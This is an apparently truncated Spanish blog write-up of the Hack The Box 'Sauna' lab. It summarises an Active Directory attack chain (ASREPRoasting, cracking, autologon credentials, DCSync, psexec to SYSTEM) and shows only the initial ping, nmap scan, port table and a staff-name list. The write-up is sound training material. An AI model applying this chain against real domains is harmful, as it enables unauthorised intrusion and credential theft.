<!DOCTYPE html><html lang="en" class="scroll-smooth" data-astro-cid-37fxchfa> <head><!-- Global Metadata --><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" type="image/ico" href="/favicon.ico"><meta name="generator" content="Astro v4.0.8"><!-- Canonical URL --><link rel="canonical" href="https://blog-template-gray.vercel.app/post/sauna/"><!-- Primary Meta Tags --><title>sauna - HTB Writeup • Fullaw4ke Blog</title><!-- ViewTransitions  --><meta name="astro-view-transitions-enabled" content="true"><meta name="astro-view-transitions-fallback" content="animate"><!-- SEO --><meta name="title" content="sauna - HTB Writeup • Fullaw4ke Blog"><meta name="description" content="En esta Maquina hacemos un ASREPRoasting y obtenemos un hash de una cuenta que no requiere preautenticación Kerberos, entre otras Cosas."><meta name="author" content="Fullaw4ke"><!-- Open Graph / Facebook --><meta property="og:type" content="article"><meta property="og:url" content="https://blog-template-gray.vercel.app/post/sauna/"><meta property="og:title" content="sauna - HTB Writeup"><meta property="og:description" content="En esta Maquina hacemos un ASREPRoasting y obtenemos un hash de una cuenta que no requiere preautenticación Kerberos, entre otras Cosas."><meta property="og:image" content="https://blog-template-gray.vercel.app/_astro/1.Env8T7_1.png"><meta property="article:author" content="Fullaw4ke"><meta property="article:published_time" content="2023-07-02T04:00:00.000Z"><!-- Twitter --><meta property="twitter:card" content="summary_large_image"><meta property="twitter:url" content="https://blog-template-gray.vercel.app/post/sauna/"><meta property="twitter:title" content="sauna - HTB Writeup"><meta property="twitter:description" content="En esta Maquina hacemos un ASREPRoasting y obtenemos un hash de una cuenta que no requiere preautenticación Kerberos, entre otras Cosas."><meta property="twitter:image" content="https://blog-template-gray.vercel.app/_astro/1.Env8T7_1.png"><!-- RSS auto-discovery --><link rel="alternate" type="application/rss+xml" title="Fullaw4ke Blog" href="/rss.xml"><link as="font" crossorigin rel="preload" href="/fonts/Manrope-Bold.woff2" type="font/woff2"><style>@font-face {font-weight: 200;font-style: normal;font-family: Manrope;font-display: swap;src: url(/fonts/Manrope-ExtraLight.woff2)}</style><style>@font-face {font-weight: 300;font-style: normal;font-family: Manrope;font-display: swap;src: url(/fonts/Manrope-Light.woff2)}</style><style>@font-face {font-weight: 400;font-style: normal;font-family: Manrope;font-display: swap;src: url(/fonts/Manrope-Regular.woff2)}</style><style>@font-face {font-weight: 500;font-style: normal;font-family: Manrope;font-display: swap;src: url(/fonts/Manrope-Medium.woff2)}</style><style>@font-face {font-weight: 600;font-style: normal;font-family: Manrope;font-display: swap;src: url(/fonts/Manrope-SemiBold.woff2)}</style><style>@font-face {font-weight: 700;font-style: normal;font-family: Manrope;font-display: swap;src: url(/fonts/Manrope-Bold.woff2)}</style><style>@font-face {font-weight: 800;font-style: normal;font-family: Manrope;font-display: swap;src: url(/fonts/Manrope-ExtraBold.woff2)}</style><style>@font-face { font-family: _font_fallback_1728653261087; size-adjust: 103.76%; src: local('Arial'); ascent-override: 102.74%; descent-override: 28.91%; line-gap-override: 0.00%; }</style><script>
	function getTheme() {
		const storedTheme = typeof localStorage !== 'undefined' && localStorage.getItem('theme')

		return (
			storedTheme || (window.matchMedia('(prefers-color-scheme: dark)').matches ? 'light' : 'dark')
		)
	}

	function setTheme(newTheme) {
		const html = document.documentElement
		const isDark = newTheme === 'dark'

		html.classList.toggle('dark', isDark)
		html.classList.toggle('light', !isDark)

		localStorage.setItem('theme', newTheme)
	}

	// set initial theme
	setTheme(getTheme())
	document.addEventListener('astro:after-swap', () => setTheme(getTheme()))

	document.addEventListener('theme-change', (e) => {
		setTheme(e.detail.theme)
	})
</script><script>
	if (!('animations' in localStorage)) {
		localStorage.setItem('animations', 'true')
	} else {
		localStorage.setItem('animations', 'false')
	}
</script><link rel="stylesheet" href="/_astro/_page_.oLAkEadO.css" />
<link rel="stylesheet" href="/_astro/_slug_.m5WJ7WE5.css" /><script type="module" src="/_astro/hoisted.cZ5bdfWX.js"></script></head> <body class="bg-white text-stone-950 dark:bg-[#0a0910] dark:text-white" data-astro-cid-37fxchfa> <main class="px-5 sm:mx-auto sm:max-w-2xl sm:px-8 lg:px-0 antialiased md:max-w-6xl grid gap-12 mt-4 overflow-hidden md:overflow-visible" data-astro-cid-37fxchfa> <header class="relative flex items-center h-12 font-semibold"> <a class="text-lg mr-auto" href="/">Home</a> <div id="astro-header-drawer" class="shadow rounded-l-lg md:bg-transparent dark:md:bg-transparent bg-white dark:bg-[#0a0910] md:shadow-none md:rounded-none md:border-none md:h-auto md:static absolute transition-transform duration-300 ease-in translate-x-96 md:translate-x-0 top-12 -right-5 pl-4 pt-6 pb-4 md:p-0 h-[200px] w-[200px] z-50"> <nav class="flex h-full flex-col justify-between gap-12 text-left md:flex-row md:w-full md:gap-5"> <div class="flex flex-col gap-4 md:flex-row md:border-r-2 border-black pr-4 dark:border-white"> <a href="/tags" class="text-opacity-60 flex items-center gap-1 text-2xl md:text-base" rel="noopener noreferrer ">  <svg xmlns="http://www.w3.org/2000/svg" class="w-8 md:w-6" viewBox="0 0 24 24" stroke-width="1.25" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M7.859 6h-2.834a2.025 2.025 0 0 0 -2.025 2.025v2.834c0 .537 .213 1.052 .593 1.432l6.116 6.116a2.025 2.025 0 0 0 2.864 0l2.834 -2.834a2.025 2.025 0 0 0 0 -2.864l-6.117 -6.116a2.025 2.025 0 0 0 -1.431 -.593z"></path> <path d="M17.573 18.407l2.834 -2.834a2.025 2.025 0 0 0 0 -2.864l-7.117 -7.116"></path> <path d="M6 9h-.01"></path> </svg> Tags
 </a> </div> <div class="flex justify-center items-center md:justify-end gap-3 md:p-0"> <a href="https://github.com/fullaw4ke" class="text-opacity-60" rel="noopener noreferrer " target="_blank" aria-label="Github">  <span><svg xmlns="http://www.w3.org/2000/svg" class="w-8 md:w-6" viewBox="0 0 24 24" stroke-width="1.3" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5"></path> </svg> </span>  </a><a href="https://x.com/fullaw4ke" class="text-opacity-60" rel="noopener noreferrer " target="_blank" aria-label="Twitter">  <span><svg xmlns="http://www.w3.org/2000/svg" class="w-8 md:w-6" viewBox="0 0 24 24" stroke-width="1.3" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M22 4.01c-1 .49 -1.98 .689 -3 .99c-1.121 -1.265 -2.783 -1.335 -4.38 -.737s-2.643 2.06 -2.62 3.737v1c-3.245 .083 -6.135 -1.395 -8 -4c0 0 -4.182 7.433 4 11c-1.872 1.247 -3.739 2.088 -6 2c3.308 1.803 6.913 2.423 10.034 1.517c3.58 -1.04 6.522 -3.723 7.651 -7.742a13.84 13.84 0 0 0 .497 -3.753c0 -.249 1.51 -2.772 1.818 -4.013z"></path> </svg> </span>  </a> </div> </nav> </div> <div class="flex items-center gap-3 md:pl-3" data-astro-transition-persist="navbar"> <div> <site-search id="search" class="ms-auto"> <button data-open-modal disabled class="flex items-center justify-center rounded-md gap-1"> <svg aria-label="search" class="h-6 w-6" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="1.5"> <path stroke="none" d="M0 0h24v24H0z"></path> <path d="M3 10a7 7 0 1 0 14 0 7 7 0 1 0-14 0M21 21l-6-6"></path> </svg> <!-- <span class='md:hidden text-2xl'> Search</span> --> </button> <dialog aria-label="search" class="h-full max-h-full w-full max-w-full border border-zinc-400 bg-white dark:bg-[#0a0910ec] shadow backdrop:backdrop-blur sm:mx-auto sm:mb-auto sm:mt-16 sm:h-max sm:max-h-[calc(100%-8rem)] sm:min-h-[15rem] sm:w-5/6 sm:max-w-[48rem] sm:rounded-md opacity-0"> <div class="dialog-frame flex flex-col gap-4 p-6 pt-12 sm:pt-6"> <button data-close-modal class="ms-auto cursor-pointer rounded-full bg-black text-white px-4 py-2 dark:bg-white dark:text-black">Close</button> <div class="search-container dark:text-white"> <div id="pagefind__search"></div> </div> </div> </dialog> </site-search>   </div>  <theme-toggle class="relative h-6 w-6"> <button id="toggle-theme" class="group" aria-label="Toggle Theme"> <span class="absolute left-0 right-0 top-0 opacity-0 group-aria-pressed:opacity-100"> <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-sun-high" width="24" height="24" viewBox="0 0 24 24" stroke-width="1" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M14.828 14.828a4 4 0 1 0 -5.656 -5.656a4 4 0 0 0 5.656 5.656z"></path> <path d="M6.343 17.657l-1.414 1.414"></path> <path d="M6.343 6.343l-1.414 -1.414"></path> <path d="M17.657 6.343l1.414 -1.414"></path> <path d="M17.657 17.657l1.414 1.414"></path> <path d="M4 12h-2"></path> <path d="M12 4v-2"></path> <path d="M20 12h2"></path> <path d="M12 20v2"></path> </svg> </span> <span class="absolute left-0 right-0 top-0 opacity-0 group-aria-[pressed=false]:opacity-100"> <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-moon" width="24" height="24" viewBox="0 0 24 24" stroke-width="1.25" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M12 3c.132 0 .263 0 .393 0a7.5 7.5 0 0 0 7.92 12.446a9 9 0 1 1 -8.313 -12.454z"></path> </svg> </span> </button> </theme-toggle> <script>
	const button = document.getElementById('toggle-theme')

	function setButtonPresssed() {
		const bodyThemeIsDark = document.documentElement.classList.contains('dark')
		button.setAttribute('aria-pressed', String(bodyThemeIsDark))
	}
	setButtonPresssed()
</script> <button id="astro-header-drawer-button" type="button" class="md:ml-6 md:hidden"> <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-menu-2" width="24" height="24" viewBox="0 0 24 24" stroke-width="1.25" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M4 6l16 0"></path> <path d="M4 12l16 0"></path> <path d="M4 18l16 0"></path> </svg> <span class="sr-only">Show Menu</span> </button> </div> </header>   <article class="min-w-full md:py-4 sm:max-w-none md:max-w-none"> <header class="mb-3 flex flex-col justify-center items-center gap-6"> <div class="flex flex-col gap-2"> <div class="flex items-center justify-center gap-x-1"> <p class="text-center text-sm text-opacity-50">
Published <time class="text-sm font-bold text-opacity-60" datetime="2023-07-02T04:00:00.000Z"> Jul 2, 2023 </time> </p> <p class="text-center text-sm text-opacity-50 font-bold">
- 7 min read </p> </div> <h1 class="text-center text-4xl md:text-6xl md:pb-2.5 font-semibold"> sauna - HTB Writeup </h1> </div> <div class="flex flex-wrap justify-center items-center gap-2 gap-y-4 md:gap-5"> <a href="/tags/easy" aria-label="Easy"> <span class="bg-indigo-600 font-semibold text-white dark:bg-indigo-900 dark:text-white shadow text-sm w-fit px-2 py-1 md:px-5 md:py-2 rounded-full"> Easy </span> </a> </div> </header> <img src="/_astro/1.Env8T7_1_ZjQj5t.jpg" loading="eager" class="rounded-md w-full max-h-[300px]  md:max-h-[500px] my-8 object-cover" alt="img of sauna - HTB Writeup" width="1000" height="500" decoding="async"> <hr> <div>  <div class="grid grid-cols-1 md:grid-cols-[20%_auto] gap-10 mt-8"> <!-- aside  --> <aside class="md:flex flex-col gap-8 hidden"> <div class="flex flex-col gap-2"> <span class="mb-1 font-bold text-2xl">Share</span> <ul class="flex gap-3 text-black dark:text-white"> <li> <a href="https://twitter.com/intent/tweet?text=Share this post https://blog-template-gray.vercel.app/post/sauna/" aria-label="Share on Twitter"><!--?xml version="1.0" ?--><svg height="32px" style="fill-rule:evenodd;clip-rule:evenodd;stroke-linejoin:round;stroke-miterlimit:2;" version="1.1" viewBox="0 0 512 512" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g><path d="M448,512l-384,0c-35.328,0 -64,-28.672 -64,-64l0,-384c0,-35.328 28.672,-64 64,-64l384,0c35.328,0 64,28.672 64,64l0,384c0,35.328 -28.672,64 -64,64Z" id="Dark_Blue" style="fill:#1da1f2;fill-rule:nonzero;"></path><path d="M196.608,386.048c120.704,0 186.752,-100.096 186.752,-186.752c0,-2.816 0,-5.632 -0.128,-8.448c12.8,-9.216 23.936,-20.864 32.768,-34.048c-11.776,5.248 -24.448,8.704 -37.76,10.368c13.568,-8.064 23.936,-20.992 28.928,-36.352c-12.672,7.552 -26.752,12.928 -41.728,15.872c-12.032,-12.8 -29.056,-20.736 -47.872,-20.736c-36.224,0 -65.664,29.44 -65.664,65.664c0,5.12 0.64,10.112 1.664,14.976c-54.528,-2.688 -102.912,-28.928 -135.296,-68.608c-5.632,9.728 -8.832,20.992 -8.832,33.024c0,22.784 11.648,42.88 29.184,54.656c-10.752,-0.384 -20.864,-3.328 -29.696,-8.192l0,0.896c0,31.744 22.656,58.368 52.608,64.384c-5.504,1.536 -11.264,2.304 -17.28,2.304c-4.224,0 -8.32,-0.384 -12.288,-1.152c8.32,26.112 32.64,45.056 61.312,45.568c-22.528,17.664 -50.816,28.16 -81.536,28.16c-5.248,0 -10.496,-0.256 -15.616,-0.896c28.928,18.432 63.488,29.312 100.48,29.312" id="Logo__x2014__FIXED" style="fill:#fff;fill-rule:nonzero;"></path></g></svg></a> </li> <li> <a href="https://www.linkedin.com/shareArticle?mini=true&#38;url=https://blog-template-gray.vercel.app/post/sauna/" aria-label="Share on LinkedIn"> <svg enable-background="new 0 0 32 32" height="32px" id="Layer_1" version="1.0" viewBox="0 0 32 32" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g><path d="M32,30c0,1.104-0.896,2-2,2H2c-1.104,0-2-0.896-2-2V2c0-1.104,0.896-2,2-2h28c1.104,0,2,0.896,2,2V30z" fill="#007BB5"></path><g><rect fill="#FFFFFF" height="14" width="4" x="7" y="11"></rect><path d="M20.499,11c-2.791,0-3.271,1.018-3.499,2v-2h-4v14h4v-8c0-1.297,0.703-2,2-2c1.266,0,2,0.688,2,2v8h4v-7    C25,14,24.479,11,20.499,11z" fill="#FFFFFF"></path><circle cx="9" cy="8" fill="#FFFFFF" r="2"></circle></g></g><g></g><g></g><g></g><g></g><g></g><g></g></svg></a> </li> </ul> </div> <div class="sticky top-24 self-start hidden md:block transition-all duration-200"> <nav class="max-w-xs dark:text-black"> <p class="font-bold mb-3 text-2xl dark:text-white">Index</p> <ul class="[text-wrap:balance] flex flex-col gap-1"> <li class="flex flex-col"> <a href="#initial-recon" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> Initial Recon </a>  </li><li class="flex flex-col"> <a href="#active-directory" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> Active Directory </a>  </li><li class="flex flex-col"> <a href="#web---port-80" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> Web - Port 80 </a>  </li><li class="flex flex-col"> <a href="#smb---port-445-recon" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> SMB - Port 445 Recon </a>  </li><li class="flex flex-col"> <a href="#kerbrute" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> Kerbrute </a>  </li><li class="flex flex-col"> <a href="#smb-pt2" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> SMB PT2 </a>  </li><li class="flex flex-col"> <a href="#lateral-movement" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> Lateral movement </a>  </li><li class="flex flex-col"> <a href="#get-administrator" class="bg-slate-200 dark:bg-slate-800 dark:hover:bg-indigo-400 hover:bg-indigo-300 hover:text-white py-1 px-4 dark:text-white rounded-full mb-2 first-letter:uppercase w-fit line-clamp-2"> Get Administrator </a>  </li> </ul> </nav> </div> </aside> <!-- post --> <article class="max-w-full w-full"> <div class="prose prose-lg md:prose-xl dark:prose-invert mb-12 min-w-full"> <p>saunana es una máquina Windows de fácil dificultad que cuenta con enumeración y explotación de Active Directory. Los posibles nombres de usuario pueden derivarse de los nombres completos de los empleados que aparecen en el sitio web. Con estos nombres de usuario, se puede realizar un ataque ASREPRoasting, que da como resultado el hash de una cuenta que no requiere preautenticación Kerberos.</p>
<p>Este hash puede ser sometido a un ataque de fuerza bruta offline, con el fin de recuperar la contraseña en texto plano para un usuario que es capaz de WinRM a la caja. La ejecución de WinPEAS revela que otro usuario del sistema ha sido configurado para iniciar sesión automáticamente e identifica su contraseña. Este segundo usuario también tiene permisos de administración remota de Windows. BloodHound revela que este usuario tiene el derecho extendido DS-Replication-Get-Changes-All, que le permite volcar hashes de contraseñas desde el Controlador de Dominio en un ataque DCSync. La ejecución de este ataque devuelve el hash del administrador de dominio principal, que se puede utilizar con Impacket psexec.py para obtener una shell en la caja como NT_AUTHORITY\SYSTEM.</p>
<h1 id="initial-recon">Initial Recon</h1>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> ping -c 1 10.10.10.175</span></span>
<span class="line"></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">PING</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#393A34;--shiki-dark:#BABED8"> (10.10.10.175) 56</span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">84</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#393A34;--shiki-dark:#BABED8"> bytes of data.</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">64</span><span style="color:#B56959;--shiki-dark:#C3E88D"> bytes</span><span style="color:#B56959;--shiki-dark:#C3E88D"> from</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175:</span><span style="color:#B56959;--shiki-dark:#C3E88D"> icmp_seq=</span><span style="color:#2F798A;--shiki-dark:#F78C6C">1</span><span style="color:#B56959;--shiki-dark:#C3E88D"> ttl=</span><span style="color:#2F798A;--shiki-dark:#F78C6C">127</span><span style="color:#B56959;--shiki-dark:#C3E88D"> time=</span><span style="color:#2F798A;--shiki-dark:#F78C6C">140</span><span style="color:#B56959;--shiki-dark:#C3E88D"> ms</span></span>
<span class="line"></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">---</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#B56959;--shiki-dark:#C3E88D"> ping</span><span style="color:#B56959;--shiki-dark:#C3E88D"> statistics</span><span style="color:#A65E2B;--shiki-dark:#C3E88D"> ---</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">1</span><span style="color:#B56959;--shiki-dark:#C3E88D"> packets</span><span style="color:#B56959;--shiki-dark:#C3E88D"> transmitted,</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 1</span><span style="color:#B56959;--shiki-dark:#C3E88D"> received,</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 0</span><span style="color:#B56959;--shiki-dark:#C3E88D">%</span><span style="color:#B56959;--shiki-dark:#C3E88D"> packet</span><span style="color:#B56959;--shiki-dark:#C3E88D"> loss,</span><span style="color:#B56959;--shiki-dark:#C3E88D"> time</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 0</span><span style="color:#B56959;--shiki-dark:#C3E88D">ms</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">rtt</span><span style="color:#B56959;--shiki-dark:#C3E88D"> min/avg/max/mdev</span><span style="color:#B56959;--shiki-dark:#C3E88D"> =</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 139.637</span><span style="color:#B56959;--shiki-dark:#C3E88D">/139.637/139.637/0.000</span><span style="color:#B56959;--shiki-dark:#C3E88D"> ms</span></span></code></pre> 
<p>Podemos ver en el escaneo de puertos que se filtra el dominio EGOTISTICAL-BANK.LOCAL. También hay tres servicios que tienen una superficie de ataque goof http 80, smb 445 y ldap 389.</p>
<p>También podemos mirar y ver que esto es probablemente un controlador de dominio. Teniendo puertos; 53 DNS, 88 Kerberos y 445 son puertos comunes de DC.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> nmap -sS --open -p- --min-rate 5000 -n -Pn -v -oG 10.10.10.175 nmap </span></span></code></pre> 





























































































































<table><thead><tr><th>Port</th><th>Service</th><th>Product</th><th>Version</th></tr></thead><tbody><tr><td>53</td><td>domain</td><td>Simple DNS Plus</td><td></td></tr><tr><td>80</td><td>HTTP</td><td>Microsoft IIS httpd</td><td>10.0</td></tr><tr><td>88</td><td>kerberos-sec</td><td>Microsoft Windows Kerberos</td><td></td></tr><tr><td>135</td><td>msrpc</td><td>Microsoft Windows RPC</td><td></td></tr><tr><td>139</td><td>netbios-ssn</td><td>Microsoft Windows netbios-ssn</td><td></td></tr><tr><td>389</td><td>ldap</td><td>Microsoft Windows Active Directory LDAP</td><td></td></tr><tr><td>445</td><td>microsoft-ds</td><td></td><td></td></tr><tr><td>464</td><td>kpasswd5</td><td></td><td></td></tr><tr><td>593</td><td>ncacn_http</td><td>Microsoft Windows RPC over HTTP</td><td>1.0</td></tr><tr><td>636</td><td>tcpwrapped</td><td></td><td></td></tr><tr><td>3268</td><td>ldap</td><td>Microsoft Windows Active Directory LDAP</td><td></td></tr><tr><td>3269</td><td>tcpwrapped</td><td></td><td></td></tr><tr><td>5985</td><td>http</td><td>Microsoft HTTPAPI httpd</td><td>2.0</td></tr><tr><td>9389</td><td>mc-nmf</td><td>.NET Message Framing</td><td></td></tr><tr><td>49667</td><td>msrpc</td><td>Microsoft Windows RPC</td><td></td></tr><tr><td>49677</td><td>ncacn_http</td><td>Microsoft Windows RPC</td><td>HTTP 1.0</td></tr><tr><td>49676</td><td>msrpc</td><td>Microsoft Windows RPC</td><td></td></tr><tr><td>49706</td><td>msrpc</td><td>Microsoft Windows RPC</td><td></td></tr><tr><td>49775</td><td>msrpc</td><td>Microsoft Windows RPC</td><td></td></tr></tbody></table>
<h1 id="active-directory">Active Directory</h1>
<h2 id="web---port-80">Web - Port 80</h2>
<p><img src="/_astro/2.2oNs3aUX_Za9W1q.webp" alt="alt text" width="1088" height="707" loading="lazy" decoding="async"></p>
<p>En la página about <a href="http://10.10.10.175/about.html">http://10.10.10.175/about.html</a>, podemos ver que hay una sección «Meet The Team» y encontrar un puñado de personas. He registrado cada uno de los nombres en el archivo llamado listUsers.txt.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> cat listUsers.txt </span></span>
<span class="line"></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Fergus</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Smith</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Shaun</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Coins</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Hugo</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Bear</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Bowie</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Taylor</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Sophie</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Driver</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">Steven</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Kerb</span></span></code></pre> 
<p>A continuación voy a utilizar una herramienta llamada nombre de usuario-anarquía para transformar la lista de palabras de los nombres a uno con nombres de usuario comunes esquemas, Herramienta Aquí</p>
